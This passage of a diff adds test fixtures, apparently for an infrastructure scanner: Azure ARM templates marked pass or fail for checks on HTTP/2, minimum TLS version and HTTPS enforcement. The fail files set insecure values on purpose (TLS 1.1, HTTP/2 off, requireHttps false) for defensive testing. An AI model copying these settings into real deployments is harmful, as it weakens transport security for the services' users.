+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": false,
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ],
+  "outputs": {
+    "proxyKey": {
+      "type": "object",
+      "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]"
+    }
+  }
+}
+
diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json
new file mode 100644
index 00000000000..69b2c86f385
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass.json
@@ -0,0 +1,374 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vaultName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key vault to be created."
+      }
+    },
+    "keyName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key to be created."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the resources"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "standard",
+      "allowedValues": [
+        "standard",
+        "premium"
+      ],
+      "metadata": {
+        "description": "The SKU of the vault to be created."
+      }
+    },
+    "keyType": {
+      "type": "string",
+      "defaultValue": "RSA",
+      "allowedValues": [
+        "EC",
+        "EC-HSM",
+        "RSA",
+        "RSA-HSM"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyType of the key to be created."
+      }
+    },
+    "keyOps": {
+      "type": "array",
+      "defaultValue": [],
+      "metadata": {
+        "description": "The permitted JSON web key operations of the key to be created."
+      }
+    },
+    "keySize": {
+      "type": "int",
+      "defaultValue": 2048,
+      "metadata": {
+        "description": "The size in bits of the key to be created."
+      }
+    },
+    "curveName": {
+      "type": "string",
+      "defaultValue": "",
+      "allowedValues": [
+        "",
+        "P-256",
+        "P-256K",
+        "P-384",
+        "P-521"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyCurveName of the key to be created."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": true,
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ],
+  "outputs": {
+    "proxyKey": {
+      "type": "object",
+      "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]"
+    }
+  }
+}
+
diff --git a/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json
new file mode 100644
index 00000000000..0871576b6cc
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppHttpVersionLatest/pass2.json
@@ -0,0 +1,373 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vaultName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key vault to be created."
+      }
+    },
+    "keyName": {
+      "type": "string",
+      "metadata": {
+        "description": "The name of the key to be created."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "The location of the resources"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "defaultValue": "standard",
+      "allowedValues": [
+        "standard",
+        "premium"
+      ],
+      "metadata": {
+        "description": "The SKU of the vault to be created."
+      }
+    },
+    "keyType": {
+      "type": "string",
+      "defaultValue": "RSA",
+      "allowedValues": [
+        "EC",
+        "EC-HSM",
+        "RSA-HSM"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyType of the key to be created."
+      }
+    },
+    "keyOps": {
+      "type": "array",
+      "defaultValue": [],
+      "metadata": {
+        "description": "The permitted JSON web key operations of the key to be created."
+      }
+    },
+    "keySize": {
+      "type": "int",
+      "defaultValue": 2048,
+      "metadata": {
+        "description": "The size in bits of the key to be created."
+      }
+    },
+    "curveName": {
+      "type": "string",
+      "defaultValue": "",
+      "allowedValues": [
+        "",
+        "P-256",
+        "P-256K",
+        "P-384",
+        "P-521"
+      ],
+      "metadata": {
+        "description": "The JsonWebKeyCurveName of the key to be created."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": "bool",
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": true,
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ],
+  "outputs": {
+    "proxyKey": {
+      "type": "object",
+      "value": "[reference(resourceId('Microsoft.KeyVault/vaults/keys', parameters('vaultName'), parameters('keyName')))]"
+    }
+  }
+}
+
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json
new file mode 100644
index 00000000000..4a5965c74df
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "fail",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": "1.1"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json
new file mode 100644
index 00000000000..c74057282fe
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/fail2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2021-02-01",
+      "name": "fail2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": "1.1"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
new file mode 100644
index 00000000000..0dbbafaebb0
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "pass",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": "1.2"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
new file mode 100644
index 00000000000..b81f1b491f8
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass2.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2021-02-01",
+      "name": "pass2",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": 1.2
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
new file mode 100644
index 00000000000..a21270870cc
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass3.json
@@ -0,0 +1,18 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2021-02-01",
+      "name": "pass3",
+      "location": "[resourceGroup().location]",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": "1.2"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
new file mode 100644
index 00000000000..93359bab29f
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppMinTLSVersion/pass4.json
@@ -0,0 +1,19 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2021-02-01",
+      "name": "pass4",
+      "location": "[resourceGroup().location]",
+      "kind": "functionapp,linux",
+      "properties": {
+        "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', 'example-app-service-plan')]",
+        "siteConfig": {
+          "minTlsVersion": 1.2
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json
new file mode 100644
index 00000000000..f26d4acabd8
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_fail.json
@@ -0,0 +1,57 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "11556880252039009077"
+    }
+  },
+  "parameters": {
+    "hostingPlanName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the hosting plan to use in Azure."
+      }
+    },
+    "webSiteName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the Azure Web app to create."
+      }
+    }
+  },
+  "resources": [
+
+
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2022-03-01",
+      "name": "sites_config_fail",
+      "properties": {
+        "globalValidation": {
+      "requireAuthentication": true,
+      "unauthenticatedClientAction": "Return401"
+    },
+    "httpSettings": {
+      "forwardProxy": {
+        "convention": "NoProxy"
+      },
+      "requireHttps": false,
+      "routes": {
+        "apiPrefix": "/.auth"
+      }
+    },
+        "javaVersion": "1.8",
+        "javaContainer": "TOMCAT",
+        "javaContainerVersion": "9.0"
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Web/sites', parameters('webSiteName'))]"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json
new file mode 100644
index 00000000000..bc7df1df928
--- /dev/null
+++ b/tests/arm/checks/resource/example_FunctionAppsAccessibleOverHttps/sites_config_pass.json
@@ -0,0 +1,57 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "11556880252039009077"
+    }
+  },
+  "parameters": {
+    "hostingPlanName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the hosting plan to use in Azure."
+      }
+    },
+    "webSiteName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "Name of the Azure Web app to create."
+      }
+    }
+  },
+  "resources": [
+
+
+    {
+      "type": "Microsoft.Web/sites/config",
+      "apiVersion": "2022-03-01",
+      "name": "sites_config_pass",
+      "properties": {
+        "globalValidation": {
+      "requireAuthentication": true,
+      "unauthenticatedClientAction": "Return401"
+    },
+    "httpSettings": {
+      "forwardProxy": {
+        "convention": "NoProxy"
+      },
+      "requireHttps": true,
+      "routes": {
+        "apiPrefix": "/.auth"
+      }
+    },
+        "javaVersion": "1.8",
+        "javaContainer": "TOMCAT",
+        "javaContainerVersion": "9.0"
+      },
+      "dependsOn": [
